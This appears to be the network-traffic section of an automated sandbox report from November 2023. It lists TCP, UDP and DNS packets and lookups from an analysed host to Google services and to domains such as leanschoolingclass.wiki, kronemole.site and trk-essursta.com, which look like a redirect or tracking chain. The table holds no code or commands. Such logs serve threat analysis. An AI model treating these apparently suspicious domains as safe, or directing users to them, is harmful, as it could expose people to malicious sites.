                                                                          Nov 21, 2023 17:59:06.007131100 CET44349803172.67.173.33192.168.2.4
                                                                          Nov 21, 2023 17:59:06.048697948 CET49803443192.168.2.4172.67.173.33
                                                                          Nov 21, 2023 17:59:06.317497015 CET44349803172.67.173.33192.168.2.4
                                                                          Nov 21, 2023 17:59:06.317609072 CET44349803172.67.173.33192.168.2.4
                                                                          Nov 21, 2023 17:59:06.317702055 CET49803443192.168.2.4172.67.173.33
                                                                          Nov 21, 2023 17:59:06.318480015 CET49803443192.168.2.4172.67.173.33
                                                                          Nov 21, 2023 17:59:06.318499088 CET44349803172.67.173.33192.168.2.4
                                                                          Nov 21, 2023 17:59:06.320817947 CET49804443192.168.2.4172.67.173.33
                                                                          Nov 21, 2023 17:59:06.320847034 CET44349804172.67.173.33192.168.2.4
                                                                          Nov 21, 2023 17:59:06.320981026 CET49804443192.168.2.4172.67.173.33
                                                                          Nov 21, 2023 17:59:06.321574926 CET49804443192.168.2.4172.67.173.33
                                                                          Nov 21, 2023 17:59:06.321587086 CET44349804172.67.173.33192.168.2.4
                                                                          Nov 21, 2023 17:59:06.583343983 CET44349804172.67.173.33192.168.2.4
                                                                          Nov 21, 2023 17:59:06.583679914 CET49804443192.168.2.4172.67.173.33
                                                                          Nov 21, 2023 17:59:06.583690882 CET44349804172.67.173.33192.168.2.4
                                                                          Nov 21, 2023 17:59:06.583991051 CET44349804172.67.173.33192.168.2.4
                                                                          Nov 21, 2023 17:59:06.584337950 CET49804443192.168.2.4172.67.173.33
                                                                          Nov 21, 2023 17:59:06.584393978 CET44349804172.67.173.33192.168.2.4
                                                                          Nov 21, 2023 17:59:06.584477901 CET49804443192.168.2.4172.67.173.33
                                                                          Nov 21, 2023 17:59:06.629260063 CET44349804172.67.173.33192.168.2.4
                                                                          Nov 21, 2023 17:59:06.908071041 CET44349804172.67.173.33192.168.2.4
                                                                          Nov 21, 2023 17:59:06.908153057 CET44349804172.67.173.33192.168.2.4
                                                                          Nov 21, 2023 17:59:06.908236980 CET44349804172.67.173.33192.168.2.4
                                                                          Nov 21, 2023 17:59:06.908238888 CET49804443192.168.2.4172.67.173.33
                                                                          Nov 21, 2023 17:59:06.908287048 CET49804443192.168.2.4172.67.173.33
                                                                          Nov 21, 2023 17:59:06.911252975 CET49804443192.168.2.4172.67.173.33
                                                                          Nov 21, 2023 17:59:06.911267996 CET44349804172.67.173.33192.168.2.4
                                                                          Nov 21, 2023 17:59:07.091767073 CET49805443192.168.2.4151.101.129.44
                                                                          Nov 21, 2023 17:59:07.091825008 CET44349805151.101.129.44192.168.2.4
                                                                          Nov 21, 2023 17:59:07.091948032 CET49805443192.168.2.4151.101.129.44
                                                                          Nov 21, 2023 17:59:07.092242002 CET49805443192.168.2.4151.101.129.44
                                                                          Nov 21, 2023 17:59:07.092258930 CET44349805151.101.129.44192.168.2.4
                                                                          Nov 21, 2023 17:59:07.303863049 CET44349805151.101.129.44192.168.2.4
                                                                          Nov 21, 2023 17:59:07.304193020 CET49805443192.168.2.4151.101.129.44
                                                                          Nov 21, 2023 17:59:07.304253101 CET44349805151.101.129.44192.168.2.4
                                                                          Nov 21, 2023 17:59:07.305140972 CET44349805151.101.129.44192.168.2.4
                                                                          Nov 21, 2023 17:59:07.305221081 CET49805443192.168.2.4151.101.129.44
                                                                          Nov 21, 2023 17:59:07.306344032 CET49805443192.168.2.4151.101.129.44
                                                                          Nov 21, 2023 17:59:07.306411028 CET44349805151.101.129.44192.168.2.4
                                                                          Nov 21, 2023 17:59:07.306488037 CET49805443192.168.2.4151.101.129.44
                                                                          Nov 21, 2023 17:59:07.306521893 CET44349805151.101.129.44192.168.2.4
                                                                          Nov 21, 2023 17:59:07.358760118 CET49805443192.168.2.4151.101.129.44
                                                                          Nov 21, 2023 17:59:07.755470991 CET44349805151.101.129.44192.168.2.4
                                                                          Nov 21, 2023 17:59:07.755666018 CET44349805151.101.129.44192.168.2.4
                                                                          Nov 21, 2023 17:59:07.755779028 CET49805443192.168.2.4151.101.129.44
                                                                          Nov 21, 2023 17:59:07.756977081 CET49805443192.168.2.4151.101.129.44
                                                                          Nov 21, 2023 17:59:07.757018089 CET44349805151.101.129.44192.168.2.4
                                                                          Nov 21, 2023 17:59:07.887716055 CET49806443192.168.2.4151.101.129.44
                                                                          Nov 21, 2023 17:59:07.887772083 CET44349806151.101.129.44192.168.2.4
                                                                          Nov 21, 2023 17:59:07.887854099 CET49806443192.168.2.4151.101.129.44
                                                                          Nov 21, 2023 17:59:07.888190031 CET49806443192.168.2.4151.101.129.44
                                                                          Nov 21, 2023 17:59:07.888206959 CET44349806151.101.129.44192.168.2.4
                                                                          Nov 21, 2023 17:59:08.095206022 CET44349806151.101.129.44192.168.2.4
                                                                          Nov 21, 2023 17:59:08.095499039 CET49806443192.168.2.4151.101.129.44
                                                                          Nov 21, 2023 17:59:08.095510960 CET44349806151.101.129.44192.168.2.4
                                                                          Nov 21, 2023 17:59:08.096404076 CET44349806151.101.129.44192.168.2.4
                                                                          Nov 21, 2023 17:59:08.096468925 CET49806443192.168.2.4151.101.129.44
                                                                          Nov 21, 2023 17:59:08.096931934 CET49806443192.168.2.4151.101.129.44
                                                                          Nov 21, 2023 17:59:08.096991062 CET44349806151.101.129.44192.168.2.4
                                                                          Nov 21, 2023 17:59:08.097064018 CET49806443192.168.2.4151.101.129.44
                                                                          Nov 21, 2023 17:59:08.097070932 CET44349806151.101.129.44192.168.2.4
                                                                          Nov 21, 2023 17:59:08.144644976 CET49806443192.168.2.4151.101.129.44
                                                                          Nov 21, 2023 17:59:08.508006096 CET44349806151.101.129.44192.168.2.4
                                                                          Nov 21, 2023 17:59:08.508161068 CET44349806151.101.129.44192.168.2.4
                                                                          Nov 21, 2023 17:59:08.508229017 CET49806443192.168.2.4151.101.129.44
                                                                          Nov 21, 2023 17:59:08.509097099 CET49806443192.168.2.4151.101.129.44
                                                                          Nov 21, 2023 17:59:08.509109974 CET44349806151.101.129.44192.168.2.4
                                                                          Nov 21, 2023 17:59:19.288702965 CET4973880192.168.2.445.156.26.175
                                                                          Nov 21, 2023 17:59:19.426944017 CET4974180192.168.2.445.156.26.175
                                                                          Nov 21, 2023 17:59:19.521565914 CET804973845.156.26.175192.168.2.4
                                                                          Nov 21, 2023 17:59:19.662472963 CET804974145.156.26.175192.168.2.4
                                                                          Nov 21, 2023 17:59:25.971761942 CET804973845.156.26.175192.168.2.4
                                                                          Nov 21, 2023 17:59:25.971858978 CET4973880192.168.2.445.156.26.175
                                                                          Nov 21, 2023 17:59:25.996718884 CET49807443192.168.2.420.114.59.183
                                                                          Nov 21, 2023 17:59:25.996781111 CET4434980720.114.59.183192.168.2.4
                                                                          Nov 21, 2023 17:59:25.996850014 CET49807443192.168.2.420.114.59.183
                                                                          Nov 21, 2023 17:59:25.997425079 CET49807443192.168.2.420.114.59.183
                                                                          Nov 21, 2023 17:59:25.997443914 CET4434980720.114.59.183192.168.2.4
                                                                          Nov 21, 2023 17:59:26.183155060 CET804974145.156.26.175192.168.2.4
                                                                          Nov 21, 2023 17:59:26.183379889 CET4974180192.168.2.445.156.26.175
                                                                          Nov 21, 2023 17:59:26.492647886 CET4434980720.114.59.183192.168.2.4
                                                                          Nov 21, 2023 17:59:26.492865086 CET49807443192.168.2.420.114.59.183
                                                                          Nov 21, 2023 17:59:26.779644012 CET49807443192.168.2.420.114.59.183
                                                                          Nov 21, 2023 17:59:26.779694080 CET4434980720.114.59.183192.168.2.4
                                                                          Nov 21, 2023 17:59:26.779928923 CET4434980720.114.59.183192.168.2.4
                                                                          Nov 21, 2023 17:59:26.815315008 CET49807443192.168.2.420.114.59.183
                                                                          Nov 21, 2023 17:59:26.861289978 CET4434980720.114.59.183192.168.2.4
                                                                          Nov 21, 2023 17:59:27.142442942 CET4434980720.114.59.183192.168.2.4
                                                                          Nov 21, 2023 17:59:27.142462969 CET4434980720.114.59.183192.168.2.4
                                                                          Nov 21, 2023 17:59:27.142503023 CET4434980720.114.59.183192.168.2.4
                                                                          Nov 21, 2023 17:59:27.142514944 CET4434980720.114.59.183192.168.2.4
                                                                          Nov 21, 2023 17:59:27.142647982 CET49807443192.168.2.420.114.59.183
                                                                          Nov 21, 2023 17:59:27.142648935 CET49807443192.168.2.420.114.59.183
                                                                          Nov 21, 2023 17:59:27.142687082 CET4434980720.114.59.183192.168.2.4
                                                                          Nov 21, 2023 17:59:27.142713070 CET4434980720.114.59.183192.168.2.4
                                                                          Nov 21, 2023 17:59:27.142762899 CET49807443192.168.2.420.114.59.183
                                                                          Nov 21, 2023 17:59:27.149888039 CET49807443192.168.2.420.114.59.183
                                                                          Nov 21, 2023 17:59:27.149938107 CET4434980720.114.59.183192.168.2.4
                                                                          Nov 21, 2023 17:59:27.150015116 CET49807443192.168.2.420.114.59.183
                                                                          Nov 21, 2023 17:59:27.150031090 CET4434980720.114.59.183192.168.2.4
                                                                          Nov 21, 2023 17:59:27.817605019 CET4973880192.168.2.445.156.26.175
                                                                          Nov 21, 2023 17:59:27.817620993 CET4974180192.168.2.445.156.26.175
                                                                          Nov 21, 2023 17:59:28.050637007 CET804973845.156.26.175192.168.2.4
                                                                          Nov 21, 2023 17:59:28.053837061 CET804974145.156.26.175192.168.2.4
                                                                          Nov 21, 2023 17:59:34.101206064 CET49809443192.168.2.4142.251.16.147
                                                                          Nov 21, 2023 17:59:34.101265907 CET44349809142.251.16.147192.168.2.4
                                                                          Nov 21, 2023 17:59:34.101325989 CET49809443192.168.2.4142.251.16.147
                                                                          Nov 21, 2023 17:59:34.101677895 CET49809443192.168.2.4142.251.16.147
                                                                          Nov 21, 2023 17:59:34.101690054 CET44349809142.251.16.147192.168.2.4
                                                                          Nov 21, 2023 17:59:34.300540924 CET44349809142.251.16.147192.168.2.4
                                                                          Nov 21, 2023 17:59:34.300895929 CET49809443192.168.2.4142.251.16.147
                                                                          Nov 21, 2023 17:59:34.300932884 CET44349809142.251.16.147192.168.2.4
                                                                          Nov 21, 2023 17:59:34.301229000 CET44349809142.251.16.147192.168.2.4
                                                                          Nov 21, 2023 17:59:34.301551104 CET49809443192.168.2.4142.251.16.147
                                                                          Nov 21, 2023 17:59:34.301618099 CET44349809142.251.16.147192.168.2.4
                                                                          Nov 21, 2023 17:59:34.354793072 CET49809443192.168.2.4142.251.16.147
                                                                          Nov 21, 2023 17:59:40.911091089 CET4972380192.168.2.423.218.218.148
                                                                          Nov 21, 2023 17:59:41.005496979 CET804972323.218.218.148192.168.2.4
                                                                          Nov 21, 2023 17:59:41.005551100 CET4972380192.168.2.423.218.218.148
                                                                          Nov 21, 2023 17:59:44.306643009 CET44349809142.251.16.147192.168.2.4
                                                                          Nov 21, 2023 17:59:44.306721926 CET44349809142.251.16.147192.168.2.4
                                                                          Nov 21, 2023 17:59:44.306883097 CET49809443192.168.2.4142.251.16.147
                                                                          Nov 21, 2023 17:59:45.812941074 CET49809443192.168.2.4142.251.16.147
                                                                          Nov 21, 2023 17:59:45.813008070 CET44349809142.251.16.147192.168.2.4
                                                                          Nov 21, 2023 17:59:50.700424910 CET498015228192.168.2.4172.253.62.188
                                                                          Nov 21, 2023 17:59:50.795413017 CET522849801172.253.62.188192.168.2.4
                                                                          Nov 21, 2023 17:59:50.930214882 CET498025228192.168.2.4172.253.62.188
                                                                          Nov 21, 2023 17:59:51.025106907 CET522849802172.253.62.188192.168.2.4
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Nov 21, 2023 17:58:31.639866114 CET5183253192.168.2.41.1.1.1
                                                                          Nov 21, 2023 17:58:31.640253067 CET5334553192.168.2.41.1.1.1
                                                                          Nov 21, 2023 17:58:31.640813112 CET6137753192.168.2.41.1.1.1
                                                                          Nov 21, 2023 17:58:31.641068935 CET5004553192.168.2.41.1.1.1
                                                                          Nov 21, 2023 17:58:31.764708996 CET53518321.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:58:31.766020060 CET53613771.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:58:31.766067028 CET53500451.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:58:31.766901016 CET53533451.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:58:31.767059088 CET53540211.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:58:32.402065992 CET53498531.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:58:33.921160936 CET5693253192.168.2.41.1.1.1
                                                                          Nov 21, 2023 17:58:33.921683073 CET5110953192.168.2.41.1.1.1
                                                                          Nov 21, 2023 17:58:34.048571110 CET53569321.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:58:34.050241947 CET6030053192.168.2.41.1.1.1
                                                                          Nov 21, 2023 17:58:34.050753117 CET5879953192.168.2.41.1.1.1
                                                                          Nov 21, 2023 17:58:34.052321911 CET53511091.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:58:34.175569057 CET53603001.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:58:34.176415920 CET53587991.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:58:36.132275105 CET5335753192.168.2.41.1.1.1
                                                                          Nov 21, 2023 17:58:36.132637024 CET6467953192.168.2.41.1.1.1
                                                                          Nov 21, 2023 17:58:36.258954048 CET53533571.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:58:36.286302090 CET53646791.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:58:37.466011047 CET6481453192.168.2.41.1.1.1
                                                                          Nov 21, 2023 17:58:37.466232061 CET6250253192.168.2.41.1.1.1
                                                                          Nov 21, 2023 17:58:37.630876064 CET53648141.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:58:37.634872913 CET53625021.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:58:38.551084995 CET5583753192.168.2.41.1.1.1
                                                                          Nov 21, 2023 17:58:38.558257103 CET5818753192.168.2.41.1.1.1
                                                                          Nov 21, 2023 17:58:38.684292078 CET53558371.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:58:38.692493916 CET53581871.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:58:41.566951036 CET5244053192.168.2.41.1.1.1
                                                                          Nov 21, 2023 17:58:41.574460983 CET5055353192.168.2.41.1.1.1
                                                                          Nov 21, 2023 17:58:41.640033960 CET5544653192.168.2.41.1.1.1
                                                                          Nov 21, 2023 17:58:41.640475035 CET5065653192.168.2.41.1.1.1
                                                                          Nov 21, 2023 17:58:41.692714930 CET53524401.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:58:41.702596903 CET53496441.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:58:41.703284025 CET53505531.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:58:41.776767969 CET53554461.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:58:41.778161049 CET53506561.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:58:44.062478065 CET53651181.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:58:44.665765047 CET5510353192.168.2.41.1.1.1
                                                                          Nov 21, 2023 17:58:44.666524887 CET6160253192.168.2.41.1.1.1
                                                                          Nov 21, 2023 17:58:44.793457031 CET53551031.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:58:44.803986073 CET53616021.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:58:46.539316893 CET5070953192.168.2.41.1.1.1
                                                                          Nov 21, 2023 17:58:46.541291952 CET5352853192.168.2.41.1.1.1
                                                                          Nov 21, 2023 17:58:46.665316105 CET53507091.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:58:46.669589043 CET53535281.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:58:47.848838091 CET4957453192.168.2.41.1.1.1
                                                                          Nov 21, 2023 17:58:47.849158049 CET5724953192.168.2.41.1.1.1
                                                                          Nov 21, 2023 17:58:47.975189924 CET53495741.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:58:47.976723909 CET53572491.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:58:49.411283016 CET53653381.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:58:52.509203911 CET138138192.168.2.4192.168.2.255
                                                                          Nov 21, 2023 17:59:05.608860970 CET6506053192.168.2.41.1.1.1
                                                                          Nov 21, 2023 17:59:05.609178066 CET5493053192.168.2.41.1.1.1
                                                                          Nov 21, 2023 17:59:05.738528013 CET53549301.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:59:05.739789009 CET53650601.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:59:06.953335047 CET5926953192.168.2.41.1.1.1
                                                                          Nov 21, 2023 17:59:06.953957081 CET5658653192.168.2.41.1.1.1
                                                                          Nov 21, 2023 17:59:07.080539942 CET53592691.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:59:07.090296030 CET53565861.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:59:07.761068106 CET5297053192.168.2.41.1.1.1
                                                                          Nov 21, 2023 17:59:07.761245966 CET5611053192.168.2.41.1.1.1
                                                                          Nov 21, 2023 17:59:07.886564016 CET53529701.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:59:07.886936903 CET53561101.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:59:08.426384926 CET53570531.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:59:31.158478022 CET53560891.1.1.1192.168.2.4
                                                                          Nov 21, 2023 17:59:31.831149101 CET53583681.1.1.1192.168.2.4
                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Nov 21, 2023 17:58:31.639866114 CET192.168.2.41.1.1.10xf028Standard query (0)clients2.google.comA (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:31.640253067 CET192.168.2.41.1.1.10xa151Standard query (0)clients2.google.com65IN (0x0001)false
                                                                          Nov 21, 2023 17:58:31.640813112 CET192.168.2.41.1.1.10xe710Standard query (0)accounts.google.comA (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:31.641068935 CET192.168.2.41.1.1.10x325cStandard query (0)accounts.google.com65IN (0x0001)false
                                                                          Nov 21, 2023 17:58:33.921160936 CET192.168.2.41.1.1.10x69c1Standard query (0)leanschoolingclass.wikiA (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:33.921683073 CET192.168.2.41.1.1.10x5c7aStandard query (0)leanschoolingclass.wiki65IN (0x0001)false
                                                                          Nov 21, 2023 17:58:34.050241947 CET192.168.2.41.1.1.10x66daStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:34.050753117 CET192.168.2.41.1.1.10x7dd7Standard query (0)www.google.com65IN (0x0001)false
                                                                          Nov 21, 2023 17:58:36.132275105 CET192.168.2.41.1.1.10x2e7Standard query (0)humifications.comA (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:36.132637024 CET192.168.2.41.1.1.10xdffStandard query (0)humifications.com65IN (0x0001)false
                                                                          Nov 21, 2023 17:58:37.466011047 CET192.168.2.41.1.1.10x2033Standard query (0)genialskin.clickA (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:37.466232061 CET192.168.2.41.1.1.10x25ebStandard query (0)genialskin.click65IN (0x0001)false
                                                                          Nov 21, 2023 17:58:38.551084995 CET192.168.2.41.1.1.10x1e2fStandard query (0)kronemole.siteA (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:38.558257103 CET192.168.2.41.1.1.10xe557Standard query (0)kronemole.site65IN (0x0001)false
                                                                          Nov 21, 2023 17:58:41.566951036 CET192.168.2.41.1.1.10xc056Standard query (0)trk-essursta.comA (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:41.574460983 CET192.168.2.41.1.1.10x4d48Standard query (0)trk-essursta.com65IN (0x0001)false
                                                                          Nov 21, 2023 17:58:41.640033960 CET192.168.2.41.1.1.10xc031Standard query (0)kronemole.siteA (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:41.640475035 CET192.168.2.41.1.1.10x114cStandard query (0)kronemole.site65IN (0x0001)false
                                                                          Nov 21, 2023 17:58:44.665765047 CET192.168.2.41.1.1.10xba2fStandard query (0)trk-amropode.comA (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:44.666524887 CET192.168.2.41.1.1.10xcb2aStandard query (0)trk-amropode.com65IN (0x0001)false
                                                                          Nov 21, 2023 17:58:46.539316893 CET192.168.2.41.1.1.10x5dceStandard query (0)event.trk-essursta.comA (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:46.541291952 CET192.168.2.41.1.1.10x53a3Standard query (0)event.trk-essursta.com65IN (0x0001)false
                                                                          Nov 21, 2023 17:58:47.848838091 CET192.168.2.41.1.1.10x5ddStandard query (0)event.trk-essursta.comA (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:47.849158049 CET192.168.2.41.1.1.10xbb47Standard query (0)event.trk-essursta.com65IN (0x0001)false
                                                                          Nov 21, 2023 17:59:05.608860970 CET192.168.2.41.1.1.10x54c9Standard query (0)subscription.trk-essursta.comA (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:05.609178066 CET192.168.2.41.1.1.10xf7a0Standard query (0)subscription.trk-essursta.com65IN (0x0001)false
                                                                          Nov 21, 2023 17:59:06.953335047 CET192.168.2.41.1.1.10x513fStandard query (0)api.taboola.comA (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:06.953957081 CET192.168.2.41.1.1.10x20c2Standard query (0)api.taboola.com65IN (0x0001)false
                                                                          Nov 21, 2023 17:59:07.761068106 CET192.168.2.41.1.1.10x92deStandard query (0)api.taboola.comA (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:07.761245966 CET192.168.2.41.1.1.10xbaeaStandard query (0)api.taboola.com65IN (0x0001)false
                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Nov 21, 2023 17:58:31.764708996 CET1.1.1.1192.168.2.40xf028No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:31.764708996 CET1.1.1.1192.168.2.40xf028No error (0)clients.l.google.com142.251.16.139A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:31.764708996 CET1.1.1.1192.168.2.40xf028No error (0)clients.l.google.com142.251.16.101A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:31.764708996 CET1.1.1.1192.168.2.40xf028No error (0)clients.l.google.com142.251.16.102A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:31.764708996 CET1.1.1.1192.168.2.40xf028No error (0)clients.l.google.com142.251.16.100A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:31.764708996 CET1.1.1.1192.168.2.40xf028No error (0)clients.l.google.com142.251.16.113A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:31.764708996 CET1.1.1.1192.168.2.40xf028No error (0)clients.l.google.com142.251.16.138A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:31.766020060 CET1.1.1.1192.168.2.40xe710No error (0)accounts.google.com142.251.16.84A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:31.766901016 CET1.1.1.1192.168.2.40xa151No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:34.048571110 CET1.1.1.1192.168.2.40x69c1No error (0)leanschoolingclass.wiki45.156.26.175A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:34.175569057 CET1.1.1.1192.168.2.40x66daNo error (0)www.google.com142.251.16.147A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:34.175569057 CET1.1.1.1192.168.2.40x66daNo error (0)www.google.com142.251.16.99A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:34.175569057 CET1.1.1.1192.168.2.40x66daNo error (0)www.google.com142.251.16.104A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:34.175569057 CET1.1.1.1192.168.2.40x66daNo error (0)www.google.com142.251.16.106A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:34.175569057 CET1.1.1.1192.168.2.40x66daNo error (0)www.google.com142.251.16.105A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:34.175569057 CET1.1.1.1192.168.2.40x66daNo error (0)www.google.com142.251.16.103A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:34.176415920 CET1.1.1.1192.168.2.40x7dd7No error (0)www.google.com65IN (0x0001)false
                                                                          Nov 21, 2023 17:58:36.258954048 CET1.1.1.1192.168.2.40x2e7No error (0)humifications.com64.137.16.19A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:37.630876064 CET1.1.1.1192.168.2.40x2033No error (0)genialskin.click104.21.14.233A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:37.630876064 CET1.1.1.1192.168.2.40x2033No error (0)genialskin.click172.67.160.193A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:37.634872913 CET1.1.1.1192.168.2.40x25ebNo error (0)genialskin.click65IN (0x0001)false
                                                                          Nov 21, 2023 17:58:38.684292078 CET1.1.1.1192.168.2.40x1e2fNo error (0)kronemole.site104.21.62.203A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:38.684292078 CET1.1.1.1192.168.2.40x1e2fNo error (0)kronemole.site172.67.139.60A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:38.692493916 CET1.1.1.1192.168.2.40xe557No error (0)kronemole.site65IN (0x0001)false
                                                                          Nov 21, 2023 17:58:41.692714930 CET1.1.1.1192.168.2.40xc056No error (0)trk-essursta.com104.21.72.3A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:41.692714930 CET1.1.1.1192.168.2.40xc056No error (0)trk-essursta.com172.67.173.33A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:41.703284025 CET1.1.1.1192.168.2.40x4d48No error (0)trk-essursta.com65IN (0x0001)false
                                                                          Nov 21, 2023 17:58:41.776767969 CET1.1.1.1192.168.2.40xc031No error (0)kronemole.site172.67.139.60A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:41.776767969 CET1.1.1.1192.168.2.40xc031No error (0)kronemole.site104.21.62.203A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:41.778161049 CET1.1.1.1192.168.2.40x114cNo error (0)kronemole.site65IN (0x0001)false
                                                                          Nov 21, 2023 17:58:44.793457031 CET1.1.1.1192.168.2.40xba2fNo error (0)trk-amropode.com172.64.96.16A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:44.793457031 CET1.1.1.1192.168.2.40xba2fNo error (0)trk-amropode.com172.64.97.16A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:44.803986073 CET1.1.1.1192.168.2.40xcb2aNo error (0)trk-amropode.com65IN (0x0001)false
                                                                          Nov 21, 2023 17:58:46.665316105 CET1.1.1.1192.168.2.40x5dceNo error (0)event.trk-essursta.com104.21.72.3A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:46.665316105 CET1.1.1.1192.168.2.40x5dceNo error (0)event.trk-essursta.com172.67.173.33A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:46.669589043 CET1.1.1.1192.168.2.40x53a3No error (0)event.trk-essursta.com65IN (0x0001)false
                                                                          Nov 21, 2023 17:58:47.975189924 CET1.1.1.1192.168.2.40x5ddNo error (0)event.trk-essursta.com104.21.72.3A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:47.975189924 CET1.1.1.1192.168.2.40x5ddNo error (0)event.trk-essursta.com172.67.173.33A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:58:47.976723909 CET1.1.1.1192.168.2.40xbb47No error (0)event.trk-essursta.com65IN (0x0001)false
                                                                          Nov 21, 2023 17:59:04.218830109 CET1.1.1.1192.168.2.40xa4caNo error (0)android.l.google.com172.253.122.113A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:04.218830109 CET1.1.1.1192.168.2.40xa4caNo error (0)android.l.google.com172.253.115.139A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:04.218830109 CET1.1.1.1192.168.2.40xa4caNo error (0)android.l.google.com172.253.122.139A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:04.218830109 CET1.1.1.1192.168.2.40xa4caNo error (0)android.l.google.com172.253.115.138A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:04.218830109 CET1.1.1.1192.168.2.40xa4caNo error (0)android.l.google.com172.253.122.101A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:04.218830109 CET1.1.1.1192.168.2.40xa4caNo error (0)android.l.google.com172.253.63.102A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:04.218830109 CET1.1.1.1192.168.2.40xa4caNo error (0)android.l.google.com172.253.122.100A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:04.218830109 CET1.1.1.1192.168.2.40xa4caNo error (0)android.l.google.com172.253.115.102A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:04.218830109 CET1.1.1.1192.168.2.40xa4caNo error (0)android.l.google.com172.253.115.100A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:04.218830109 CET1.1.1.1192.168.2.40xa4caNo error (0)android.l.google.com172.253.122.138A (IP address)IN (0x0001)false
                                                                          Nov 21, 2023 17:59:04.218830109 CET1.1.1.1192.168.2.40xa4caNo error (0)android.l.google.com172.253.63.138A (IP address)IN (0x0001)false
